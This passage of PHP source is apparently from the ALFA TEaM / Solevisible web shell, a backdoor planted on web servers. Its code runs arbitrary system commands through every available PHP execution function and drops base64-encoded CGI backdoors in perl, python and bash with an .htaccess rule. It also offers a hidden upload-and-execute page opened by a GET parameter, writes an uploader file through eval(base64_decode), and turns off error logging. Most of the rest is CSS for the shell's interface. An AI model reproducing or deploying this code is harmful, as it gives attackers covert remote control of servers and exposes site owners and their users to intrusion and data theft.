659 $bash = "rVRdj5pAFH2uv+I6DGa1Iaybpg9amrRboptYbV360JQGWRiFyPI5WreU/95hoCyjsfFh52nm3nM/zuTcK3XVBz9UH+zM6xDHi0AhgG6jkJKQKvQpJiOg5EBVjz4GZmiGqLPehQ71oxCcjW9tCLW+LO4Na2+n2VU/7wA7PwDhpf71m87sn3VjuviEoKsBKoEIfkKvBymhuzSs0V1QfrMQFrD8bt0by7v5xDqH5cjbxdzQ54Y10+cTYyrCXqXEdkGZwxEKTtLzjHVUIdJyiRO5hHF6poQlUEICw5OegsixA9gDBY+/qYZwPlTV1yoUsoy47ZfnB6RMkku0AGVD4RoUmzHJaVH9jcxYjMGNOLw8+zLNvmAIWTblQYEaDy9ApYHcsvnrC7JTj4RNRHk8jUFG16ObQjBXBZgVCea6I7T6pxOTnQPOvWLV4NY+v7pRSPiFQ6uw/3w3U5Gon/KzAwo3Zz47gRi27MszbnPsjAAegv9MbqIbfaH3RmR5WwZFLZ1EO3b0ROrjcfMslSPmPpmDCypz8Nnylfd8Dx8XxvRF+b0MhaS4nAbJbIdfMs9f0+qmIcADECemrpwcj0fMC8pyrz0Z29IYy7LWNnLZxtJAa9mqdiUcC+Hl3hoiYPPyYTZDoHDlZirgLaj1IOGsJmwKpMghjlLK3FukoZWwQcBEeG+iFRIHoxmElv65toDV7iQ7kj5p+IqPD3YeXfgDbEWTt29AUarU/WpdNxiPONuzqHKpv4tT8t50UId1FbBdwWsULb9aA/4C";
660 if($lang=="perl")$source = $perl;elseif($lang=="py")$source = $py;else $source = $bash;
661 alfaWriteTocgiapi($lang.".alfa",$source);
662 alfacgihtaccess('cgi', "alfacgiapi/");
663 }else{
664 $lang = $_COOKIE["alfacgiapi"];
665 }
666 $cmd = "check=W3NvbGV2aXNpYmxlfmFwaV0=&cmd=".__ZW5jb2Rlcg("cd ".$GLOBALS['cwd'].";".$cmd);
667 if($is_curl){
668 $address = ($_SERVER['SERVER_PORT'] == 443 ? "https://" : "http://").$_SERVER["SERVER_NAME"].dirname($_SERVER["REQUEST_URI"])."/alfacgiapi/".$lang.".alfa";
669 $post = new AlfaCURL();
670 $data = $post->Send($address, "post", $cmd);
671 }elseif($is_socket){
672 $server = $_SERVER["SERVER_NAME"];
673 $uri = dirname($_SERVER["REQUEST_URI"])."/alfacgiapi/".$lang.".alfa";
674 $data = _alfa_fsockopen($server,$uri,$cmd);
675 }
676 $out = "";
677 if(strstr($data, "[solevisible~api]")){
678 if($set_cookie){
679 __alfa_set_cookie("alfacgiapi", $lang);
680 }
681 if(@preg_match("/<pre>(.*?)<\/pre>/s", $data, $res)){
682 $out = $res[1];
683 }
684 }elseif($lang=="perl"){
685 return _alfa_cgicmd($cmd_pure,"py",$set_cookie);
686 }elseif($lang=="py"){
687 return _alfa_cgicmd($cmd_pure,"bash",$set_cookie);
688 }else{
689 if($set_cookie){
690 __alfa_set_cookie("alfacgiapi_mode", "off");
691 }
692 }
693 return trim($out);
694 }else{
695 return "";
696 }
697}
698function alfaEx($in,$re=false,$cgi=true,$all=false){
699 $data = _alfa_php_cmd($in,$re);
700 if(empty($data)&&$cgi||$all){
701 if($GLOBALS['sys']=='unix'){
702 if(strlen(_alfa_php_cmd("whoami"))==0||$all){
703 $cmd = _alfa_cgicmd($in);
704 if(!empty($cmd)){
705 return $cmd;
706 }
707 }
708 }
709 }
710 return $data;
711}
712function _alfa_php_cmd($in,$re=false){
713$out='';
714try{
715if($re)$in=$in." 2>&1";
716if(function_exists('exec')){
717@exec($in,$out);
718$out = @join("\n",$out);
719}elseif(function_exists('passthru')) {
720ob_start();
721@passthru($in);
722$out = ob_get_clean();
723}elseif(function_exists('system')){
724ob_start();
725@system($in);
726$out = ob_get_clean();
727} elseif (function_exists('shell_exec')) {
728$out = shell_exec($in);
729}elseif(function_exists("popen")&&function_exists("pclose")){
730if(is_resource($f = @popen($in,"r"))){
731$out = "";
732while(!@feof($f))
733$out .= fread($f,1024);
734pclose($f);
735}
736}elseif(function_exists('proc_open')){
737$pipes = array();
738$process = @proc_open($in.' 2>&1', array(array("pipe","w"), array("pipe","w"), array("pipe","w")), $pipes, null);
739$out=@stream_get_contents($pipes[1]);
740}elseif(class_exists('COM')){
741$alfaWs = new COM('WScript.shell');
742$exec = $alfaWs->exec('cmd.exe /c '.$_POST['alfa1']);
743$stdout = $exec->StdOut();
744$out=$stdout->ReadAll();
745}
746}catch(Exception $e){}
747return $out;
748}
749function _alfa_fsockopen($server,$uri,$post){
750 $socket = @fsockopen($server, 80, $errno, $errstr, 15);
751 if($socket){
752 $http = "POST {$uri} HTTP/1.0\r\n";
753 $http .= "Host: {$server}\r\n";
754 $http .= "User-Agent: " . $_SERVER['HTTP_USER_AGENT'] . "\r\n";
755 $http .= "Content-Type: application/x-www-form-urlencoded\r\n";
756 $http .= "Content-length: " . strlen($post) . "\r\n";
757 $http .= "Connection: close\r\n\r\n";
758 $http .= $post . "\r\n\r\n";
759 fwrite($socket, $http);
760 $contents = "";
761 while (!@feof($socket)) {
762 $contents .= @fgets($socket, 4096);
763 }
764 list($header, $body) = explode("\r\n\r\n", $contents, 2);
765 @fclose($socket);
766 return $body;
767 }else{
768 return "";
769 }
770}
771if(isset($_GET["solevisible"])){
772@error_reporting(E_ALL ^ E_NOTICE);
773echo '<html>';
774echo "<title>Solevisible Hidden Shell</title>";
775echo "<body bgcolor=#000000>";
776echo '<b><big><font color=#7CFC00>Kernel : </font><font color="#FFFFF">'.(function_exists('php_uname')?php_uname():'???').'</font></b></big>';
777$safe_mode = @ini_get('safe_mode');
778if($safe_mode){$r = "<b style='color: red'>On</b>";}else{$r = "<b style='color: green'>Off</b>";}
779echo "<br><b style='color: #7CFC00'>OS: </font><font color=white>" . PHP_OS . "</font><br>";
780echo "<b style='color: #7CFC00'>Software: </font><font color=white>" . $_SERVER ['SERVER_SOFTWARE'] . "</font><br>";
781echo "PHP Version: <font color=white>" . PHP_VERSION . "</font><br />";
782echo "PWD:<font color=#FFFFFF> " . str_replace("\\","/",@getcwd()) . "/<br />";
783echo "<b style='color: #7CFC00'>Safe Mode : $r<br>";
784echo"<font color=#7CFC00>Disable functions : </font>";
785$disfun = @ini_get('disable_functions');
786if(empty($disfun)){$disfun = '<font color="green">NONE</font>';}
787echo"<font color=red>";
788echo "$disfun";
789echo"</font><br>";
790echo "<b style='color: #7CFC00'>Your Ip Address is : </font><font color=white>" . $_SERVER['REMOTE_ADDR'] . "</font><br>";
791echo "<b style='color: #7CFC00'>Server Ip Address is : </font><font color=white>".(function_exists('gethostbyname')?@gethostbyname($_SERVER["HTTP_HOST"]):'???')."</font><br><p>";
792echo '<hr><center><form onSubmit="this.upload.disabled=true;this.cwd.value = btoa(unescape(encodeURIComponent(this.cwd.value)));" action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
793echo 'CWD: <input type="text" name="cwd" value="'.str_replace("\\","/",@getcwd()).'/" size="59"><p><input type="file" name="file" size="45"><input name="upload" type="submit" id="_upl" value="Upload"></p></form></center>';
794if(isset($_FILES['file'])){
795if(@move_uploaded_file($_FILES['file']['tmp_name'], __ZGVjb2Rlcg(@$_POST['cwd']).'/'.$_FILES['file']['name'])){echo '<b><font color="#7CFC00"><center>Upload Successfully ;)</font></a><font color="#7CFC00"></b><br><br></center>'; }
796else{echo '<center><b><font color="#7CFC00">Upload failed :(</font></a><font color="#7CFC0"></b></center><br><br>'; }
797}
798echo '<hr><form onSubmit="this.execute.disabled=true;this.command_solevisible.value = btoa(unescape(encodeURIComponent(this.command_solevisible.value)));" method="POST">Execute Command: <input name="command_solevisible" value="" size="59" type="text" align="left" ><input name="execute" value="Execute" type="submit"><br></form>
799<hr><pre>';
800if(isset($_POST['command_solevisible'])){
801if(strtolower(substr(PHP_OS,0,3))=="win")$separator='&';else $separator=';';
802$solevisible = "cd '".addslashes(str_replace("\\","/",@getcwd()))."'".$separator."".__ZGVjb2Rlcg($_POST['command_solevisible']);
803echo alfaEx($solevisible);
804}
805echo'</pre>
806</body></html>';
807exit;}
808@error_reporting(E_ALL ^ E_NOTICE);
809@ini_set('error_log',NULL);
810@ini_set('log_errors',0);
811@ini_set('max_execution_time',0);
812@ini_set('magic_quotes_runtime', 0);
813@set_time_limit(0);
814if(function_exists('set_magic_quotes_runtime')){
815@set_magic_quotes_runtime(0);
816}
817foreach($_POST as $key => $value){
818if(is_array($_POST[$key])){
819$i=0;
820foreach($_POST[$key] as $f) {
821$f = trim(str_replace(' ', '+',$f));
822$_POST[$key][$i] = decrypt_post($f);
823$i++;
824}
825}else{
826$value = trim(str_replace(' ', '+',$value));
827$_POST[$key] = decrypt_post($value);
828}
829}
830$default_action = 'FilesMan2';//'FilesMan';
831$default_use_ajax = true;
832$default_charset = 'Windows-1251';
833if(strtolower(substr(PHP_OS,0,3))=="win")
834$GLOBALS['sys']='win';
835else
836$GLOBALS['sys']='unix';
837$GLOBALS['home_cwd'] = @getcwd();
838$GLOBALS["need_to_update_header"] = "false";
839$GLOBALS['glob_chdir_false'] = false;
840if(isset($_POST['c'])){
841if(!@chdir($_POST['c'])){
842 $GLOBALS['glob_chdir_false'] = true;
843}
844}
845$GLOBALS['cwd'] = (isset($_POST['c']) && @is_dir($_POST['c']) ?$_POST['c']:@getcwd());
846if($GLOBALS['glob_chdir_false']){
847 $GLOBALS['cwd'] = (isset($_POST['c']) && !empty($_POST['c']) ? $_POST['c'] : @getcwd());
848}
849if($GLOBALS['sys'] == 'win'){
850$GLOBALS['home_cwd'] = str_replace("\\", "/", $GLOBALS['home_cwd']);
851$GLOBALS['cwd'] = str_replace("\\", "/", $GLOBALS['cwd']);
852}
853if($GLOBALS['cwd'][strlen($GLOBALS['cwd'])-1] != '/' )$GLOBALS['cwd'] .= '/';
854if(!function_exists('sys_get_temp_dir')){function sys_get_temp_dir() {foreach (array('TMP', 'TEMP', 'TMPDIR') as $env_var) {if ($temp = getenv($env_var)) {return $temp;}}$temp = tempnam($GLOBALS['__file_path'], '');if (_alfa_file_exists($temp,false)) {unlink($temp);return dirname($temp);}return null;}}
855define("ALFA_TEMPDIR", (function_exists("sys_get_temp_dir") ? (@is_writable(str_replace('\\','/',sys_get_temp_dir()))?sys_get_temp_dir():(@is_writable('.')?'.':false)) : false));
856function alfahead(){
857$GLOBALS['__ALFA_SHELL_CODE'] = 'PD9waHAgZWNobyAiPHRpdGxlPlNvbGV2aXNpYmxlIFVwbG9hZGVyPC90aXRsZT5cbjxib2R5IGJnY29sb3I9IzAwMDAwMD5cbjxicj5cbjxjZW50ZXI+PGZvbnQgY29sb3I9XCJ3aGl0ZVwiPjxiPllvdXIgSXAgQWRkcmVzcyBpczwvYj4gPGZvbnQgY29sb3I9XCJ3aGl0ZVwiPjwvZm9udD48L2NlbnRlcj5cbjxiaWc+PGZvbnQgY29sb3I9XCIjN0NGQzAwXCI+PGNlbnRlcj5cbiI7ZWNobyAkX1NFUlZFUlsnUkVNT1RFX0FERFInXTtlY2hvICI8L2NlbnRlcj48L2ZvbnQ+PC9hPjxmb250IGNvbG9yPVwiIzdDRkMwMFwiPlxuPGJyPlxuPGJyPlxuPGNlbnRlcj48Zm9udCBjb2xvcj1cIiM3Q0ZDMDBcIj48YmlnPlNvbGV2aXNpYmxlIFVwbG9hZCBBcmVhPC9iaWc+PC9mb250PjwvYT48Zm9udCBjb2xvcj1cIiM3Q0ZDMDBcIj48L2ZvbnQ+PC9jZW50ZXI+PGJyPlxuPGNlbnRlcj48Zm9ybSBtZXRob2Q9J3Bvc3QnIGVuY3R5cGU9J211bHRpcGFydC9mb3JtLWRhdGEnIG5hbWU9J3VwbG9hZGVyJz4iO2VjaG8gJzxpbnB1dCB0eXBlPSJmaWxlIiBuYW1lPSJmaWxlIiBzaXplPSI0NSI+PGlucHV0IG5hbWU9Il91cGwiIHR5cGU9InN1Ym1pdCIgaWQ9Il91cGwiIHZhbHVlPSJVcGxvYWQiPjwvZm9ybT48L2NlbnRlcj4nO2lmKGlzc2V0KCRfUE9TVFsnX3VwbCddKSYmJF9QT1NUWydfdXBsJ109PSAiVXBsb2FkIil7aWYoQG1vdmVfdXBsb2FkZWRfZmlsZSgkX0ZJTEVTWydmaWxlJ11bJ3RtcF9uYW1lJ10sICRfRklMRVNbJ2ZpbGUnXVsnbmFtZSddKSkge2VjaG8gJzxiPjxmb250IGNvbG9yPSIjN0NGQzAwIj48Y2VudGVyPlVwbG9hZCBTdWNjZXNzZnVsbHkgOyk8L2ZvbnQ+PC9hPjxmb250IGNvbG9yPSIjN0NGQzAwIj48L2I+PGJyPjxicj4nO31lbHNle2VjaG8gJzxiPjxmb250IGNvbG9yPSIjN0NGQzAwIj48Y2VudGVyPlVwbG9hZCBmYWlsZWQgOig8L2ZvbnQ+PC9hPjxmb250IGNvbG9yPSIjN0NGQzAwIj48L2I+PGJyPjxicj4nO319ZWNobyAnPGNlbnRlcj48c3BhbiBzdHlsZT0iZm9udC1zaXplOjMwcHg7IGJhY2tncm91bmQ6IHVybCgmcXVvdDtodHRwOi8vc29sZXZpc2libGUuY29tL2ltYWdlcy9iZ19lZmZlY3RfdXAuZ2lmJnF1b3Q7KSByZXBlYXQteCBzY3JvbGwgMCUgMCUgdHJhbnNwYXJlbnQ7IGNvbG9yOiByZWQ7IHRleHQtc2hhZG93OiA4cHggOHB4IDEzcHg7Ij48c3Ryb25nPjxiPjxiaWc+c29sZXZpc2libGVAZ21haWwuY29tPC9iPjwvYmlnPjwvc3Ryb25nPjwvc3Bhbj48L2NlbnRlcj4nOz8+';
858$alfa_uploader = '$x = base64_decode("'.$GLOBALS['__ALFA_SHELL_CODE'].'");$solevisible = fopen("solevisible.php","w");fwrite($solevisible,$x);';
859define("ALFA_UPLOADER", "eval(base64_decode('".__ZW5jb2Rlcg($alfa_uploader)."'))");
860if(!isset($_POST['ajax'])){
861function Alfa_GetDisable_Function(){
862$disfun = @ini_get('disable_functions');
863$afa = '<span class="header_show_all">All Functions Accessible</span>';
864if(empty($disfun))return($afa);
865$s = explode(',',$disfun);
866$s = array_unique($s);
867$i=0;
868$b=0;
869$func = array('system','exec','shell_exec','proc_open','popen','passthru','symlink','dl');
870$black_list = array();
871$allow_list = array();
872foreach($s as $d){
873 $d=trim($d);
874 if(empty($d)||!is_callable($d))continue;
875 if(!function_exists($d)){
876 if(in_array($d,$func)){
877 $dis .= $d." | ";$b++;
878 $black_list[] = $d;
879 }else{
880 $allow_list[] = $d;
881 }
882 $i++;
883 }
884}
885if($i==0)return($afa);
886if($i <= count($func)){
887$all = array_values(array_merge($black_list, $allow_list));
888return('<span class="disable_functions">'.implode(" | ", $all).'</span>');
889}
890return('<span class="disable_functions">'.$dis.'</span><a id="menu_opt_GetDisFunc" href=javascript:void(0) onclick="alfa_can_add_opt = true;g(\'GetDisFunc\',null,\'wp\');"><span class="header_show_all">Show All ('.$i.')</span></a>');
891}
892function AlfaNum(){
893$args = func_get_args();
894$alfax = array();
895$find = array();
896for($i=1;$i<=10;$i++){
897$alfax[] = $i;
898}
899foreach($args as $arg){
900$find[] = $arg;
901}
902echo '<script>';
903foreach($alfax as $alfa){
904if(in_array($alfa,$find))
905continue;
906echo 'alfa'.$alfa."_=";
907}
908echo '""</script>';
909}
910if(empty($_POST['charset']))
911$_POST['charset'] = $GLOBALS['default_charset'];
912$freeSpace = function_exists('diskfreespace')?@diskfreespace($GLOBALS['cwd']):'?';
913$totalSpace = function_exists('disk_total_space')?@disk_total_space($GLOBALS['cwd']):'?';
914$totalSpace = $totalSpace?$totalSpace:1;
915$on="<span class='header_on'> ON </span>";
916$of="<span class='header_off'> OFF </span>";
917$none="<span class='header_none'> NONE </span>";
918if(function_exists('ssh2_connect'))
919$ssh2=$on;
920else
921$ssh2=$of;
922if(function_exists('curl_version'))
923$curl=$on;
924else
925$curl=$of;
926if(function_exists('mysql_get_client_info')||class_exists('mysqli'))
927$mysql=$on;
928else
929$mysql=$of;
930if(function_exists('mssql_connect'))
931$mssql=$on;
932else
933$mssql=$of;
934if(function_exists('pg_connect'))
935$pg=$on;
936else
937$pg=$of;
938if(function_exists('oci_connect'))
939$or=$on;
940else
941$or=$of;
942if(@ini_get('disable_functions'))
943$disfun=@ini_get('disable_functions');
944else
945$disfun="All Functions Enable";
946if(@ini_get('safe_mode'))
947$safe_modes="<span class='header_off'>ON</span>";
948else
949$safe_modes="<span class='header_on'>OFF</span>";
950$cgi_shell="<span class='header_off' id='header_cgishell'>OFF</span>";
951if(@ini_get('open_basedir')){
952$basedir_data = @ini_get('open_basedir');
953if(strlen($basedir_data)>120){
954$open_b=substr($basedir_data,0, 120)."...";
955}else{
956$open_b = $basedir_data;
957}
958}else{$open_b=$none;}
959if(@ini_get('safe_mode_exec_dir'))
960$safe_exe=@ini_get('safe_mode_exec_dir');
961else
962$safe_exe=$none;
963if(@ini_get('safe_mode_include_dir'))
964$safe_include=@ini_get('safe_mode_include_dir');
965else
966$safe_include=$none;
967if(!function_exists('posix_getegid'))
968{
969$user = function_exists("get_current_user")?@get_current_user():"????";
970$uid = function_exists("getmyuid")?@getmyuid():"????";
971$gid = function_exists("getmygid")?@getmygid():"????";
972$group = "?";
973}else{
974$uid = function_exists("posix_getpwuid")&&function_exists("posix_geteuid")?@posix_getpwuid(posix_geteuid()):array("name"=>"????", "uid"=>"????");
975$gid = function_exists("posix_getgrgid")&&function_exists("posix_getegid")?@posix_getgrgid(posix_getegid()):array("name"=>"????", "gid"=>"????");
976$user = $uid['name'];
977$uid = $uid['uid'];
978$group = $gid['name'];
979$gid = $gid['gid'];
980}
981$cwd_links = '';
982$path = explode("/", $GLOBALS['cwd']);
983$n=count($path);
984for($i=0; $i<$n-1; $i++) {
985$cwd_links .= "<a class='header_pwd' onclick='g(\"FilesMan\",\"";
986$cach_cwd_path = "";
987for($j=0; $j<=$i; $j++){
988$cwd_links .= $path[$j].'/';
989$cach_cwd_path .= $path[$j].'/';
990}
991$cwd_links .= "\")' path='".$cach_cwd_path."' href='#action=fileman&path=".$cach_cwd_path."'>".$path[$i]."/</a>";
992}
993$drives = "";
994foreach(range('a','z') as $drive)
995if(@is_dir($drive.':\\'))
996$drives .= '<a href="javascript:void(0);" class="header_drive" onclick="g(\'FilesMan\',\''.$drive.':/\')">[ '.$drive.' ]</a> ';
997$csscode =' -moz-animation-name: spin;-moz-animation-iteration-count: infinite;-moz-animation-timing-function: linear;-moz-animation-duration: 1s;-webkit-animation-name: spin;-webkit-animation-iteration-count: infinite;-webkit-animation-timing-function: linear;-webkit-animation-duration: 1s;-ms-animation-name: spin;-ms-animation-iteration-count: infinite;-ms-animation-timing-function: linear;-ms-animation-duration: 1s;animation-name: spin;animation-iteration-count: infinite;animation-timing-function: linear;animation-duration: 1s;';
998echo '<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
999<html xmlns="http://www.w3.org/1999/xhtml">
1000<head>
1001<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
1002<meta name="ROBOTS" content="NOINDEX, NOFOLLOW" />
1003<link href="'.__showicon('alfamini').'" rel="icon" type="image/x-icon"/>
1004<title>..:: '.$_SERVER['HTTP_HOST'].' ~ ALFA TEaM Shell - v'.__ALFA_VERSION__.'-'.__ALFA_CODE_NAME__.' ::..</title>
1005<link href="https://fonts.googleapis.com/css?family=Francois+One" rel="stylesheet">
1006<style type="text/css">
1007.hlabale {
1008 color: #67ABDF;
1009 border-radius: 4px;
1010 border: 1px solid #27979B;
1011 margin-left: 7px;
1012 padding: 2px;
1013}
1014#tbl_sympphp tr {
1015 text-align: center;
1016}
1017.view_ml_content,#PhpCode,.php-evals-ace {
1018 position: absolute;
1019 top: 0;
1020 right: 0;
1021 bottom: 0;
1022 left: 0;
1023 background: #1b292b26;
1024 top: 50px;
1025}
1026.editor-view {
1027 position: relative;
1028 height: 100%;
1029}
1030.view-content {
1031 position: absolute;
1032 overflow-y: auto;
1033 width: 100%;
1034 height: 93%;
1035}
1036*::-webkit-scrollbar-track {
1037 -webkit-box-shadow: inset 0 0 6px rgba(0,0,0,0.3);
1038 border-radius: 10px;
1039 background-color: #000115;
1040}
1041*::-webkit-scrollbar{
1042 width: 10px;
1043 background-color: #000115;
1044}
1045*::-webkit-scrollbar-thumb {
1046 border-radius: 10px;
1047 -webkit-box-shadow: inset 0 0 6px rgba(0,0,0,.3);
1048 background-color: rgb(30, 130, 181);
1049}
1050.editor-file-name {
1051 margin-left: 29px;
1052 margin-top: 4px;
1053 overflow: hidden;
1054 text-overflow: ellipsis;
1055 white-space: nowrap;
1056}
1057.editor-icon {
1058 position: absolute;
1059}
1060.is_active {
1061 background: rgba(49, 55, 93, 0.77);
1062 border-radius: 10px;
1063}
1064.history-list {
1065 height: 88%;
1066 overflow-y: auto;
1067}
1068.opt-title {
1069 position: absolute;
1070 left: 50%;
1071 top: 50%;
1072 transform: translate(-50%, -50%);
1073 color: #2fd051;
1074 font-size: 25px;
1075 font-family: monospace;
1076}
1077.options_min_badge {
1078 visibility: hidden;
1079 text-align: center;
1080 right: 30px;
1081 color: white;
1082 background: #2a8a24;
1083 padding: 6px;
1084 border-radius: 50%;
1085 width: 15px;
1086 height: 15px;
1087 display: inline-block;
1088 position: absolute;
1089 top: -7px;
1090}
1091#editor-minimized,#cgiloader-minimized,#options_window-minimized,#database_window-minimized {
1092 display: block;
1093 position: fixed;
1094 right: -30px;
1095 width: 30px;
1096 height: 30px;
1097 top: 30%;
1098 z-index: 9999;
1099}
1100.minimized-wrapper {
1101 position: relative;
1102 background: rgb(14, 48, 74);
1103 width: 44px;
1104 height: 130px;/*167px;*/
1105 cursor: pointer;
1106 border-bottom-left-radius: 5px;
1107 border-top-left-radius: 5px;
1108}
1109.minimized-text {
1110 transform: rotate(-90deg);
1111 color: wheat;
1112 font-size: x-large;
1113 display: inline-block;
1114 position: absolute;
1115 right: -51px;
1116 width: 129px;
1117 top: -10px;
1118 border-top-left-radius: 4%;
1119 height: 56px;
1120 padding: 3px
1121}
1122.close-button,.editor-minimize {
1123 height: 26px;
1124 width: 38px;
1125 right: 7px;
1126 background: rgb(29, 86, 115);
1127 cursor: pointer;
1128 position: absolute;
1129 box-sizing: border-box;
1130 line-height: 50px;
1131 display: inline-block;
1132 top: 17px;
1133 border-radius: 100px;
1134}
1135.editor-minimize {right: 50px;}
1136.close-button:before,.close-button:after,.editor-minimize:before {
1137 transform: rotate(-45deg);
1138 content: "";
1139 position: absolute;
1140 top: 63%;
1141 right: 6px;
1142 margin-top: -5px;
1143 margin-left: -25px;
1144 display: block;
1145 height: 4px;
1146 width: 27px;
1147 background-color: rgba(216, 207, 207, 0.75);
1148 transition: all 0.25s ease-out;
1149}
1150.editor-minimize:before{
1151 transform: rotate(0deg);
1152}
1153.close-button:after {
1154 transform: rotate(-135deg);
1155}
1156.close-button:hover:before,.close-button:hover:after,.editor-minimize:hover:before{
1157 background-color: red;
1158}
1159.close-button:hover,.editor-minimize:hover{
1160 background-color: rgba(39, 66, 80, 0.96);
1161}
1162#editor,#cgiloader,#options_window,#database_window {
1163 display: none;
1164 position: fixed;
1165 top: 0;
1166 width: 100%;
1167 height: 100%;
1168 z-index: 20;
1169}
1170.editor-wrapper {
1171 width: 100%;
1172 height: 100%;
1173 position: relative;
1174 top: 1%;
1175}
1176.editor-header {
1177 width: 97%;
1178 background: rgba(21, 66, 88, 0.93);
1179 height: 37px;
1180 margin-left: 13px;
1181 position: relative;
1182 border-top-left-radius: 15px;
1183 border-top-right-radius: 15px;
1184}
1185.editor-path {
1186 position: absolute;
1187 font-size: x-large;
1188 margin-left: 10px;
1189 top: 6px;
1190 color: springgreen;
1191}
1192.editor-modal {
1193 position: relative;
1194 top: 0;
1195 background-color: rgba(0, 1, 23, 0.95);
1196 height: 90%;
1197 margin-left: 20%;
1198 margin-right: 2%;
1199 border: 2px #0e304a solid;
1200}
1201.editor-explorer {
1202 width: 19%;
1203 height: 90%;
1204 background-color: rgba(0, 1, 23, 0.94);
1205 position: absolute;
1206 z-index: 2;
1207 left: 1%;
1208 border: 2px rgb(14, 48, 74) solid;
1209}
1210.editor-controller {
1211 position: relative;
1212 top: -13px;
1213}
1214.file-holder {
1215 position: relative;
1216 width: 100%;
1217 height: 30px;
1218}
1219.file-holder > .history {
1220 position: absolute;
1221 color: rgb(3, 179, 163);
1222 cursor: pointer;
1223 left:5px;
1224 font-size: 18px;
1225 font-family: sans-serif;
1226 width:89%;
1227 height:100%;
1228 z-index: 3;
1229 border-radius: 10px;
1230 transition: background-color 600ms ease-out;
1231}
1232.file-holder > .history-close {
1233 display: block;
1234 opacity: 0;
1235 position: absolute;
1236 right: 2px;
1237 width: 20px;
1238 top: 4px;
1239 text-align: center;
1240 cursor: pointer;
1241 color: white;
1242 background: red;
1243 border-radius: 100px;
1244 font-family: monospace;
1245 z-index: 10;
1246 transition: opacity 600ms ease-out;
1247 font-size: 15px;
1248 height: 19px;
1249}
1250.file-holder > .history:hover {
1251 background-color: #646464;
1252}
1253.editor-explorer > .hheader {
1254 position: relative;
1255 color: rgb(20, 255, 7);
1256 border-bottom: 2px rgb(32, 106, 162) solid;
1257 text-align: center;
1258 font-family: sans-serif;
1259 margin-bottom: 10px;
1260 height: 55px;
1261}
1262.editor-search {
1263 position: absolute;
1264 bottom: 7px;
1265 left: 31px;
1266}
1267.hheader-text {
1268 position: absolute;
1269 left: 8px;
1270 top: 2px;
1271}
1272.history-clear {
1273 position: absolute;
1274 right: 8px;
1275 top: 2px;
1276 cursor: pointer;
1277}
1278.editor-body {
1279 position: relative;
1280 margin-left: 3px;
1281 height: 100%;
1282}
1283.editor-anim-close {
1284 '.showAnimation("editorClose").'
1285}
1286@keyframes editorClose {
1287 0% {
1288 visibility: 1;
1289 opacity: 1;
1290 }
1291 100% {
1292 visibility: 0;
1293 opacity: 0;
1294 }
1295}
1296.editor-anim-minimize {
1297 '.showAnimation("editorMinimize").'
1298}
1299@keyframes editorMinimize {
1300 0% {
1301 right:0px;
1302 opacity: 1;
1303 }
1304 100% {
1305 right: -2000px;
1306 opacity: 0;
1307 }
1308}
1309.editor-anim-show {
1310 '.showAnimation("editorShow").'
1311}
1312@keyframes editorShow {
1313 0% {
1314 right:-2000px;
1315 opacity: 0;
1316 }
1317 100% {
1318 right: 0px;
1319 opacity: 1;
1320 }
1321}
1322.minimized-show {
1323 '.showAnimation("minimizeShow").'
1324}
1325@keyframes minimizeShow {
1326 0% {
1327 right: -30px;
1328 opacity: 0;
1329 }
1330 100% {
1331 right: 0px;
1332 opacity: 1;
1333 }
1334}
1335.minimized-hide {
1336 '.showAnimation("minimizeHide").'
1337}
1338@keyframes minimizeHide {
1339 0% {
1340 right: 0px;
1341 opacity: 1;
1342 }
1343 100% {
1344 right: -30px;
1345 opacity: 0;
1346 }
1347}
1348.solevisible-text:hover {
1349 -webkit-text-shadow: 0px 0px 25px #00FF00;
1350 -moz-text-shadow: 0px 0px 25px #00FF00;
1351 -ms-text-shadow: 0px 0px 25px #00FF00;
1352 text-shadow: 0px 0px 25px #00FF00;
1353}
1354.update-holder {
1355 position: fixed;
1356 top: 0;
1357 background-color: rgba(0, 24, 29, 0.72);
1358 width: 100%;
1359 height: 100%;
1360}
1361.update-content {
1362 position: relative;
1363}
1364.update-content > a {
1365 text-decoration: none;
1366 position: absolute;
1367 color: rgba(103, 167, 47, 0.77);
1368 left: 24%;
1369 margin-top: 7%;
1370 font-size: 40px;
1371 font-family: "Francois One", sans-serif;
1372}
1373.update-close {
1374 position: absolute;
1375 right: 0;
1376 margin-right: 23px;
1377 top: 10px;
1378 font-size: 27px;
1379 background-color: #130f50;
1380 width: 5%;
1381 border-radius: 100px;
1382 cursor: pointer;
1383 border: 2px rgb(14, 38, 90) solid;
1384}
1385.update-close:hover {
1386 border: 2px #25ff00 solid;
1387 color: #FF0000;
1388}
1389.filestools {
1390 height: auto;
1391 width: auto;
1392 color: #67ABDF;
1393 font-size: 12px;
1394 font-family: Verdana,Geneva,sans-serif;
1395}
1396@-moz-document url-prefix() {
1397 #search-input {
1398 width: 173px;
1399 }
1400 .editor-path {
1401 top:3px;
1402 }
1403}
1404.filters-holder {
1405 padding: 5px;
1406 padding-left: 10px;
1407}
1408.filters-holder input {
1409 width: 200px;
1410}
1411.filters-holder span {
1412 color: #8bc7f7;
1413}
1414#rightclick_menu {
1415 width: 175px;
1416 visibility: hidden;
1417 opacity: 0;
1418 position: fixed;
1419 background: #0f304a;
1420 color: #555;
1421 font-family: sans-serif;
1422 font-size: 11px;
1423 -webkit-transition: opacity .5s ease-in-out;
1424 -moz-transition: opacity .5s ease-in-out;
1425 -ms-transition: opacity .5s ease-in-out;
1426 -o-transition: opacity .5s ease-in-out;
1427 transition: opacity .5s ease-in-out;
1428 -webkit-box-shadow: -1px 0px 17px 0px rgb(139, 139, 140);
1429 -moz-box-shadow: -1px 0px 17px 0px rgb(139, 139, 140);
1430 box-shadow: -1px 0px 17px 0px rgb(139, 139, 140);
1431 padding: 0px;
1432 border: 1px solid #737373;
1433 border-radius: 10px;
1434}
1435
1436#rightclick_menu a {
1437 display: block;
1438 color: #fff;
1439 font-weight: bolder;
1440 text-decoration: none;
1441 padding: 6px 8px 6px 30px;
1442 position: relative;
1443 padding-left: 40px;
1444}
1445
1446#rightclick_menu a img,
1447#rightclick_menu a i.fa {
1448 height: 20px;
1449 font-size: 17px;
1450 width: 20px;
1451 position: absolute;
1452 left: 5px;
1453 top: 2px;
1454 padding-left: 5px;
1455}
1456
1457#rightclick_menu a span {
1458 color: #BCB1B3;
1459 float: right;
1460}
1461
1462#rightclick_menu a:hover {
1463 color: #fff;
1464 background: #3879D9;
1465}
1466
